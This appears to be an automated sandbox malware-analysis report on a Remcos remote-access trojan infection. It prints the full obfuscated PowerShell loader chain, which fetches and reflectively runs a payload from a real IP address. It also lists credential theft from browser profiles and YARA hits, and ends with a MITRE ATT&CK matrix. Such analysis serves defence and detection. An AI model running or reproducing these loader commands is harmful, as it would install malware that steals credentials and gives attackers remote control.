                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?B
v?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??og?v?c8?oq?x?c4?mg?w?di?lg?y?dm?mw?u?de?ng?5?c8?v?bh?gs?lwbs?gu?zw?v?e0?yqby?ho?lwbe?fi?rw?v?fi?v?bd?c8?qqbe?c8?z?bs?gw?lgb0?hg?d??n?c??ow?k?em?wqby?eo?u??g?d0?i??o?c??wwbt?hk?cwb0?gu?bq?u?ek?tw?u?f??yqb0?gg?xq?6?do?rwbl?hq?v?bl?g0?c?bq?ge?d?bo?cg?kq?g?cs?i??n?gq?b?bs?d??mq?u?hq?e?b0?cc?i??p?c??owbj?g4?dgbv?gs?zq?t?fc?zqbi?fi?zqbx?hu?zqbz?hq?i??t?fu?ugbj?c??j?bd?em?ugbo?g0?i??t?e8?dqb0?ey?aqbs?gu?i??k?em?wqby?eo?u??g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?i?bw?g8?dwbl?hi?cwbo?gu?b?bs?c4?zqb4?gu?i??t?gm?bwbt?g0?yqbu?gq?i?b7?c??j?bd?fk?cgbk?f??i??9?c??k??g?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?c??kq?g?ds?j?bn?ec?aqbt?ee?i??9?c??k??g?ec?zqb0?c0?qwbv?g4?d?bl?g4?d??g?c0?u?bh?hq?a??g?cq?qwbz?hi?sgbq?c??kq?g?ds?i?b9?c??ow?k?hg?awbs?gw?a??g?d0?i??n?d??jw?g?ds?j?bi?h??dgby?hy?i??9?c??jw?l?eo?awbr?ge?cwbe?gy?zwby?fq?zw?l?cc?i??7?fs?qgb5?hq?zqbb?f0?xq?g?cq?bqbx?g8?bgbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?i?bh?gu?d??t?em?bwbu?hq?zqbu?hq?i??t?f??yqb0?gg?i??k?em?wqby?eo?u??g?ck?lgby?gu?c?bs?ge?ywbl?cg?jw?k?cq?jw?s?cc?qq?n?ck?i??p?c??owbb?fm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?g0?cqbv?g4?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?b
v?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?c??jwbk?ee?qg?0?ee?s?br?ee?t?bn?ei?mgbb?ec?o?bb?gi?zwbb?du?qqbe?eu?qqbj?hc?qgb2?ee?s?bn?ee?t?b3?ei?egbb?ec?uqbb?fk?uqbc?hy?qqbh?hc?qqbi?gc?qg?z?ee?rw?4?ee?wgbb?ee?dgbb?eq?awbb?e0?uqbc?gw?qqbi?ek?qqbz?gc?qgb0?ee?rwbv?ee?yqbr?ei?mgbb?ec?o?bb?gi?zwbb?hy?qqbd?d??qqbm?fe?qq?y?ee?r?bj?ee?tgbr?ee?m?bb?eg?sqbb?gi?dwbc?d??qqbh?e0?qqba?fe?qgbv?ee?qw?4?ee?wgb3?ei?eqbb?ec?o?bb?ew?zwbc?d??qqbh?fu?qqbh?hc?qgbq?ee?s?bv?ee?wqbn?ei?m?bb?ec?awbb?fk?zwbb?hy?qqbd?dg?qqbp?gc?qgb6?ee?s?bb?ee?z?bb?ei?m?bb?ec?zwbb?cc?i??s?c??j?bi?h??dgby?hy?i??s?c??jwbf?f8?xwbf?f8?cwbj?hm?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?hg?awbs?gw?a??s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?c??ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'http://91.202.233.169/tak/reg/marz/drg/rtc/ad/dll.txt' ;$cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;invoke-webrequest -uri $ccrhm -outfile $cyrjp -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;$ggima = ( get-content -path $cyrjp ) ; } ;$xkllh = '0' ;$bpvrv = 'c:\users\user\desktop\sostener.vbs' ;[byte[]] $mqons = [system.convert]::frombase64string( ( get-content -path $cyrjp ).replace('$$','a') ) ;[system.appdomain]::currentdomain.load($mqons).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ( 'dab4ahqalgb2ag8abga5adeacwbvahmalwbzagqayqbvagwabgb3ag8azaavadkamqblahiaygbtaguaaqb2ag8abgavac0alqa2adcanqa0ahiabwb0agmazqboac8azwbyag8algb0aguaawbjahuaygb0agkaygavac8aogbzahaadab0agga' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'roda' )) ;"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand iaakaemawqbyaeoauaagad0aiaaoacaawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accaiaapacaaowakagcarwbpag0aqqagad0aiaaoacaarwblahqalqbdag8abgb0aguabgb0acaalqbqageadaboacaajabdafkacgbkafaaiaapacaaowagaa== -inputformat xml -outputformat text
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand iaakaemawqbyaeoauaagad0aiaaoacaawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accaiaapacaaowakagcarwbpag0aqqagad0aiaaoacaarwblahqalqbdag8abgb0aguabgb0acaalqbqageadaboacaajabdafkacgbkafaaiaapacaaowagaa== -inputformat xml -outputformat textJump to behavior
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\VMf
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\13<M
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\}M{
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\k`M
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\M
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\21
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDMt
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\k
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\*MJ
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\#MQ
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager;
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\XMX
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\QM_
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, registros.dat.15.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00433E0A cpuid 15_2_00433E0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,15_2_0040E679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,15_2_004470AE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,15_2_004510BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_004511E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,15_2_004512EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_004513B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,15_2_00447597
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00450A7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,15_2_00450CF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,15_2_00450D42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,15_2_00450DDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_00450E6A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00404915 GetLocalTime,CreateEventA,CreateThread,15_2_00404915
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041A7A2 GetComputerNameExW,GetUserNameW,15_2_0041A7A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_0044800F
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040B21B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db15_2_0040B335

                  Remote Access Functionality

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0883UG
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe15_2_00405042
                  MITRE ATT&CK Matrix (one line per tactic column; the number in parentheses is the report's badge shown on that technique cell)

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
                  Resource Development: Scripting (121); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
                  Execution: Native API (1); Exploitation for Client Execution (1); Command and Scripting Interpreter (3); Service Execution (2); PowerShell (3); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
                  Persistence: Scripting (121); DLL Side-Loading (1); Windows Service (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                  Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (222); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                  Defense Evasion: Deobfuscate/Decode Files or Information (111); Obfuscated Files or Information (4); Software Packing (1); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (21); Access Token Manipulation (1); Process Injection (222); Dynamic API Resolution; Stripped Payloads; Embedded Payloads
                  Credential Access: OS Credential Dumping (1); Input Capture (211); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
                  Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (33); Security Software Discovery (21); Virtualization/Sandbox Evasion (21); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1)
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
                  Collection: Archive Collected Data (12); Input Capture (211); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
                  Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
